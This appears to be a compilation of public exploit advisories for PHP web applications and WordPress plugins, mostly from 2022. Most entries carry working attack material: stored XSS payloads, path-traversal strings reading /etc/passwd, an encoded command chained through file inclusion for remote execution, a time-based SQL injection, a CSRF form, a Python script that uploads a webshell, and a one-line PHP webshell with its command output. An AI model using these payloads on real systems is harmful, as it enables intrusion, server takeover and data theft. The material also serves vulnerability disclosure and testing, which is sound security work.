<pre><code>## Title: Medical Hub Directory Site 1.0 XSS Stored <br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br />## Description:<br />Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.<br /><br />Status: CRITICAL<br />[+] Payloads:<br />```<br />https://0day.gov/mhds/admin/?page=system <br />> System Short Name<br /><img src=1 href=1 onerror="javascript:alert('HEJAP ZAIRY AL-SHARIF')"></img><br />```<br /><br />## Proof and Exploit:<br />https://i.imgur.com/UU6i7SN.png<br />https://i.imgur.com/qF6DabE.png<br /></code></pre>
<pre><code># Title: Medical Hub Directory Site LFI To RCE<br /># Author: Hejap Zairy<br /># Date: 30.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15252/simple-medical-hub-directory-site-phpoop-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/mhds.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /><br />#vulnerability Code php<br />Needs more filtering require_once<br /><br />```<br /><?php <br />require_once('config.php');<br />$page = isset($_GET['page']) ? $_GET['page'] : 'home';<br />$page_name = explode("/",$page)[count(explode("/",$page)) -1];<br />?>```<br /><br />[+] Payload GET<br /><br /><br />```<br />GET /mhds/index.php?page=../../../0day&515=%74%79%70%65%20%43%3a%5c%30%64%61%79%5f%48%65%6a%61%70%5f%2e%74%78%74%20%26%26%20%64%69%72%20%43%3a%5c HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Content-Length: 354<br />Cookie: PHPSESSID=c9sbs70le23qois1riekoj8osg<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /><br />#Status: CRITICAL<br /><br />#Response <br />```<br /><br />Hegap Zairy 0day Volume in drive C is OS<br />Volume Serial Number is 2EF1-9DCA<br /><br /> Directory of C:\<br /><br />03/18/2022 10:27 AM <DIR> Program Files<br />03/21/2022 01:45 PM <DIR> Program Files (x86)<br />03/02/2022 11:04 PM <DIR> Python27<br />03/26/2022 08:33 PM <DIR> Temp<br />03/26/2022 08:45 PM <DIR> Users<br /><br />```<br /><br /><br /><br /># Description:<br />Local File Inclusion is an attack technique in which attackers trick a web application into either running or exposing files on a web server or execution file If converted rce<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/pKIxv1l.png<br /></code></pre>
<pre><code># Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQL Injection<br />(Authenticated)<br /># Date: 2021-04-14<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://www.cszcms.com/<br /># Software Link:<br />https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip<br /># Version: 1.2.9<br /># Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46<br /># CVE: CVE-2021-43701<br /><br />*Steps to Reproduce:*<br />1. First login to your Admin Panel<br />2. then go to "General Menu > CSV Export / Import".<br />3. open burp site and configure with browser.<br />4. then select any "Table Name" > Select "Fields Select" and Select "Sort<br />by"<br />5. Now click "Export to CSV" and intercept with burp suite<br />6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject<br />Blind SQL Injection use this query "(select(0)from(select(sleep(10)))a)" in<br />"orderby" parameter.<br /><br />*Proof of Concept:*<br />http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV<br /><br />*Output:*<br />By issuing sleep(0) response will be delayed to 0 seconds.<br />By issuing sleep(1) response will be delayed to 1 seconds.<br />By issuing sleep(5) response will be delayed to 5 seconds.<br />By issuing sleep(10) response will be delayed to 10 seconds<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin video-synchro-pdf 1.7.4 - Local File<br />Inclusion - Unauthenticated<br /># Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/video-synchro-pdf/<br /># Version: 1.7.4<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable File: video-synchro-pdf/reglages/Menu_Plugins/tout.php<br /><br /># Vulnerable Code:<br /><br />```<br /><?php<br />if ($_GET['p']<=NULL) {<br /> include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/index.php');<br />}else{<br /> include(REPERTOIRE_VIDEOSYNCPDF.'reglages/Menu_Plugins/'.$_GET['p'].'.php');<br />}<br />```<br /><br /># Proof of Concept:<br /><br />http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=<br /><http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>[LFI]<br />http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=<br /><http://localhost/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=../../../../../../../../../../../../../etc/index>../../../../../../../../../etc/passwd%00<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin cab-fare-calculator 1.0.3 - Local<br />File Inclusion - Unauthenticated<br /># Google Dork: inurl:/wp-content/plugins/cab-fare-calculator/<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/cab-fare-calculator/<br /># Version: 1.0.3<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># Vulnerable File: tblight.php<br /><br /># Vulnerable Code:<br /><br />```<br />if(!empty($_GET['controller']) && !empty($_GET['action']) &&<br />!empty($_GET['ajax']) && $_GET['ajax'] == 1)<br />{<br /> require_once('' . 'controllers/'.$_GET['controller'].'.php');<br />}<br />```<br /><br /># Proof of concept:<br /><br />http://localhost:10003//wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1<br /><http://localhost:10003/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/index&action=1&ajax=1><br /><br /># POC image:<br /><br />https://prnt.sc/9O8_akDp2HPC<br /></code></pre>
<pre><code># Exploit Title: Atom CMS 2.0 - Remote Code Execution (RCE)<br /># Date: 22.03.2022<br /># Exploit Author: Ashish Koli (Shikari)<br /># Vendor Homepage: https://thedigitalcraft.com/<br /># Software Link: https://github.com/thedigicraft/Atom.CMS<br /># Version: 2.0<br /># Tested on: Ubuntu 20.04.3 LTS<br /># CVE: CVE-2022-25487<br /><br /># Description<br />This script uploads webshell.php to the Atom CMS. An application will store that file in the uploads directory with a unique number which allows us to access Webshell.<br /><br /># Usage : python3 exploit.py <IP> <Port> <atomcmspath><br /># Example: python3 exploit.py 127.0.0.1 80 /atom<br /><br /># POC Exploit: https://youtu.be/qQrq-eEpswc<br /># Note: Crafted "Shell.txt" file is required for exploitation which is available on the below link:<br /># https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC<br /><br />'''<br />Description:<br />A file upload functionality in Atom CMS 2.0 allows any<br />non-privileged user to gain access to the host through the uploaded files,<br />which may result in remote code execution.<br />'''<br /><br />#!/usr/bin/python3<br />'''<br />Import required modules:<br />'''<br />import sys<br />import requests<br />import json<br />import time<br />import urllib.parse<br />import struct<br />import re<br />import string<br />import linecache<br /><br /><br /><br />proxies = {<br /> 'http': 'http://localhost:8080',<br /> 'https': 'https://localhost:8080',<br />}<br /><br />'''<br />User Input:<br />'''<br />target_ip = sys.argv[1]<br />target_port = sys.argv[2]<br />atomcmspath = sys.argv[3]<br /><br /><br />'''<br />Get cookie<br />'''<br />session = requests.Session()<br />link = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin'<br />response = session.get(link)<br />cookies_session = session.cookies.get_dict()<br />cookie = json.dumps(cookies_session)<br />cookie = cookie.replace('"}','')<br />cookie = cookie.replace('{"', '')<br />cookie = cookie.replace('"', '')<br />cookie = cookie.replace(" ", '')<br />cookie = cookie.replace(":", '=')<br /><br />'''<br />Upload Webshell:<br />'''<br /># Construct Header:<br />header1 = {<br /> 'Host': target_ip, <br /> 'Accept': 'application/json',<br /> 'Cache-Control': 'no-cache',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36',<br /> 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryH7Ak5WhirAIQ8o1L',<br /> 'Origin': 'http://' + target_ip,<br /> 'Referer': 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/index.php?page=users&id=1',<br /> 'Accept-Encoding': 'gzip, deflate',<br /> 'Accept-Language': 'en-US,en;q=0.9',<br /> 'Cookie': cookie,<br /> 'Connection': 'close',<br /> <br />}<br /><br /><br /># loading Webshell payload: <br />path = 'shell.txt'<br />fp = open(path,'rb')<br />data= fp.read()<br /><br /><br /># Uploading Webshell:<br />link_upload = 'http://' + target_ip + ':' + target_port + atomcmspath + '/admin/uploads.php?id=1'<br />upload = requests.post(link_upload, headers=header1, data=data)<br /><br />p=upload.text<br />x = re.sub("\s", "\n", p)<br />y = x.replace("1<br>Unknown", "null")<br />z = re.sub('[^0-9]', '', y)<br /><br />'''<br />Finish:<br />'''<br />print('Uploaded Webshell to: http://' + target_ip + ':' + target_port + atomcmspath + '/uploads/' + z + '.php')<br />print('')<br /> <br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin donorbox-donation-form 7.1.6 -<br />Stored Cross Site Scripting (Authenticated)<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage:<br />https://wordpress.org/plugins/donorbox-donation-form<br /><https://wordpress.org/plugins/amministrazione-aperta/><br /># Version: 7.1.6<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /><br /># Vulnerable Code:<br /><br />```<br />public function donorbox_embed_campaign_id_settings() { ?><br /> <input<br />name="donorbox_embed_campaign_options[donorbox_embed_campaign_id]"<br />type="text" value="<?php echo $this->options['donorbox_embed_campaign_id'];<br />?>" class="regular-text" /><br /> <?php<br /> }<br />```<br /><br /># POC<br /><br />1) Install donorbox-donation-form<br /><https://wordpress.org/plugins/amministrazione-aperta/> WordPress plugin<br />2)Open donorbox plugin settings<br />3) Inject payload in URL field<br />4) XSS will trigger.<br /><br /># Timeline<br /><br />21/03/2022 - Vendor notified<br />24/03/2022 - Fix / patch<br />24/03/2022 - CVE Requested<br />29/03/2022 - Public disclosure<br /></code></pre>
<pre><code># Exploit Title: WordPress plugin clipr version 1.2.3 - ( Authenticated )<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/clipr/<br /><https://wordpress.org/plugins/amministrazione-aperta/><br /># Version: 1.2.3<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br /># POC<br /><br />- Install Plugin https://wordpress.org/plugins/clipr/<br />- Navigate to the settings page pf the plugin:<br />http://localhost:10003/wp-admin/options-general.php?page=clipr<br />- Inject paylaod `asdasd'></script><script>alert(1)</script>`<br />- Navigate to the main page of the WordPress URL<br />`http://localhost:10003/` <http://localhost:10003/><br />- Malicious Javascript payload will execute.<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin curtain 1.0.2 - CSRF<br /># Date: 29-03-2022<br /># Exploit Author: Hassan Khan Yusufzai - Splint3r7<br /># Vendor Homepage: https://wordpress.org/plugins/curtain/<br /><https://wordpress.org/plugins/amministrazione-aperta/><br /># Version: 1.0.2<br /># Tested on: Firefox<br /># Contact me: h [at] spidersilk.com<br /><br />## Summary:<br /><br />Cross site forgery vulnerability has been identified in curtain<br />WordPress plugin that allows an attacker to to activate or dedicative<br />sites maintenance mode.<br /><br />## Vulnerable URL:<br /><br />http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=<br /><http://localhost:10003/wp-admin/options-general.php?page=curtain&_wpnonce=&mode=0>1<br /><br />## CSRF POC Exploit<br /><br />```<br /><html><br /> <body><br /> <form action="http://localhost:10003/wp-admin/options-general.php"><br /> <input type="hidden" name="page" value="curtain" /><br /> <input type="hidden" name="_wpnonce" value="" /><br /> <input type="hidden" name="mode" value="1" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br />```<br /><br />- To deactivate change mode value to 0<br /></code></pre>
<pre><code># Title: Message System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 29.07.2022<br /># Vendor: https://www.sourcecodester.com/php/15249/message-system-phpoop-free-source-code.html<br /># Software:https://www.sourcecodester.com/sites/default/files/download/oretnom23/pmms_1.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br />registered user can bypass waf upload .php.png files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload image files<br /><br />```<br /> if(isset($_FILES['image']) && $_FILES['image']['tmp_name'] != ''){<br /> if(!is_dir(base_app."uploads/users"))<br /> mkdir(base_app."uploads/users");<br /> $fname = 'uploads/users/avatar-'.$uid.'.png';<br /> $dir_path =base_app. $fname;<br /> $upload = $_FILES['image']['tmp_name'];<br /> $type = mime_content_type($upload);<br /> $allowed = array('image/png','image/jpeg');<br /> if(!in_array($type,$allowed)){<br /> $resp['msg'].=" But Image failed to upload due to invalid file type.";<br /> }else{<br /> $new_height = 200; <br /> $new_width = 200; <br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /pmms/registration.php?id=1&firstname=Admin&middlename=admin&lastname=admin&gender=Male&dob=2022-03-30&username=Admin&password=Admin12345A%40%23&image=0day_Hejap.png HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=jj352kdlpp0ib5lu0v5ddm199m<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------409902128312379197203124536738<br />Content-Disposition: form-data; name="image"; filename="0day_hejap.png.php"<br />Content-Type: image/png<br /><br /><?=`$_GET[515]`?><br /><br />-----------------------------409902128312379197203124536738<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /pmms/uploads/users/0day_hejap.png.php?515=echo+Hejap+Zairy HTTP/1.1<br /><br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Cookie: PHPSESSID=pqbgvck1gedt9if6p582nt9a41<br />Upgrade-Insecure-Requests: 1<br /><br /><br /><br /><br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Tue, 29 Mar 2022 12:45:59 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Access-Control-Allow-Origin: *<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br /><br />https://i.imgur.com/7mZnH7L.png<br />https://i.imgur.com/rDdybxC.png<br /><br /></code></pre>